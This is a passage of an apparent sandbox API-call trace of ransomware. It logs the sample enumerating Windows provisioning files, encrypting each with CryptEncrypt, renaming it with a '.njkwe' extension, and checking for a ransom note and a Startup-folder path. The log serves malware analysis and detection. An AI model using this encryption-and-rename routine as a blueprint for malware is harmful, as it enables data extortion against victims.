[0077.429] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.429] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.429] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.429] CloseHandle (hObject=0x43c) returned 1 [0077.429] GetProcessHeap () returned 0xbe0000 [0077.429] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.429] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0077.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\224__connections_cellular_docomo (japan)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\224__Connections_Cellular_DoCoMo (Japan)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\224__connections_cellular_docomo (japan)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.430] GetProcessHeap () returned 0xbe0000 [0077.430] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.430] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9083dfdf, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9083dfdf, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9083dfdf, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml", cAlternateFileName="225__C~1.PRO")) returned 1 [0077.430] lstrcmpiW (lpString1="225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.430] lstrcmpiW (lpString1="225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.430] lstrcmpiW (lpString1="225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.430] lstrcmpiW (lpString1="225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.430] lstrcmpiW (lpString1="225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.430] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml") returned 158 [0077.430] StrStrIW (lpFirst="225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.430] lstrcmpW (lpString1="225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.430] lstrcmpW (lpString1="225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.430] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\225__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.430] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\225__connections_cellular_docomo (japan)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.430] GetTickCount () returned 0x1153b11 [0077.430] GetTickCount () returned 0x1153b11 [0077.430] GetTickCount () returned 0x1153b11 [0077.430] GetTickCount () returned 0x1153b11 [0077.430] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.430] GetProcessHeap () returned 0xbe0000 [0077.430] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.431] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0077.444] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.444] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0077.444] GetProcessHeap () returned 0xbe0000 [0077.444] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.444] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.444] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.444] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.444] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.444] CloseHandle (hObject=0x43c) returned 1 [0077.444] GetProcessHeap () returned 0xbe0000 [0077.444] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.444] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0077.444] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\225__connections_cellular_docomo (japan)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\225__Connections_Cellular_DoCoMo (Japan)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\225__connections_cellular_docomo (japan)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.445] GetProcessHeap () returned 0xbe0000 [0077.445] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.445] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9083dfdf, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9083dfdf, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9083dfdf, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x343, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="226__C~1.PRO")) returned 1 [0077.445] lstrcmpiW (lpString1="226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.445] lstrcmpiW (lpString1="226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.445] lstrcmpiW (lpString1="226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.445] lstrcmpiW (lpString1="226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.445] lstrcmpiW (lpString1="226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.445] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml") returned 159 [0077.445] StrStrIW (lpFirst="226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.445] lstrcmpW (lpString1="226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.445] lstrcmpW (lpString1="226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.445] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\226__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.445] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\226__connections_cellular_orange (jordan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.446] GetTickCount () returned 0x1153b21 [0077.446] GetTickCount () returned 0x1153b21 [0077.446] GetTickCount () returned 0x1153b21 [0077.446] GetTickCount () returned 0x1153b21 [0077.446] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.446] GetProcessHeap () returned 0xbe0000 [0077.446] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.446] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x343, lpOverlapped=0x0) returned 1 [0077.447] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.447] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x343, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x343, lpOverlapped=0x0) returned 1 [0077.448] GetProcessHeap () returned 0xbe0000 [0077.448] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.448] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.448] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.448] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.448] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.448] CloseHandle (hObject=0x43c) returned 1 [0077.448] GetProcessHeap () returned 0xbe0000 [0077.448] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.448] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.448] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\226__connections_cellular_orange (jordan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\226__Connections_Cellular_Orange (Jordan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\226__connections_cellular_orange (jordan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.449] GetProcessHeap () returned 0xbe0000 [0077.449] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.449] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9086424b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9086424b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9086424b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x27c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="227__C~1.PRO")) returned 1 [0077.449] lstrcmpiW (lpString1="227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.449] lstrcmpiW (lpString1="227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.449] lstrcmpiW (lpString1="227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.449] lstrcmpiW (lpString1="227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.449] lstrcmpiW (lpString1="227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.449] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml") returned 159 [0077.449] StrStrIW (lpFirst="227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.449] lstrcmpW (lpString1="227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.449] lstrcmpW (lpString1="227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.449] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\227__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.449] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\227__connections_cellular_umniah (jordan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.450] GetTickCount () returned 0x1153b21 [0077.450] GetTickCount () returned 0x1153b21 [0077.450] GetTickCount () returned 0x1153b21 [0077.450] GetTickCount () returned 0x1153b21 [0077.450] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.450] GetProcessHeap () returned 0xbe0000 [0077.450] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.450] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x27c, lpOverlapped=0x0) returned 1 [0077.451] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.451] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x27c, lpOverlapped=0x0) returned 1 [0077.451] GetProcessHeap () returned 0xbe0000 [0077.451] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.452] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.452] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.452] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.452] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.452] CloseHandle (hObject=0x43c) returned 1 [0077.452] GetProcessHeap () returned 0xbe0000 [0077.452] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.452] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.452] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\227__connections_cellular_umniah (jordan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\227__Connections_Cellular_Umniah (Jordan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\227__connections_cellular_umniah (jordan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.457] GetProcessHeap () returned 0xbe0000 [0077.457] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.457] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9086424b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9086424b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9086424b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="228__C~1.PRO")) returned 1 [0077.457] lstrcmpiW (lpString1="228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.457] lstrcmpiW (lpString1="228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.457] lstrcmpiW (lpString1="228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.457] lstrcmpiW (lpString1="228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.457] lstrcmpiW (lpString1="228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.457] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml") returned 157 [0077.457] StrStrIW (lpFirst="228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.457] lstrcmpW (lpString1="228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.457] lstrcmpW (lpString1="228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.457] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\228__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.457] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\228__Connections_Cellular_Zain (Jordan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\228__connections_cellular_zain (jordan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.458] GetTickCount () returned 0x1153b31 [0077.458] GetTickCount () returned 0x1153b31 [0077.458] GetTickCount () returned 0x1153b31 [0077.458] GetTickCount () returned 0x1153b31 [0077.458] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.458] GetProcessHeap () returned 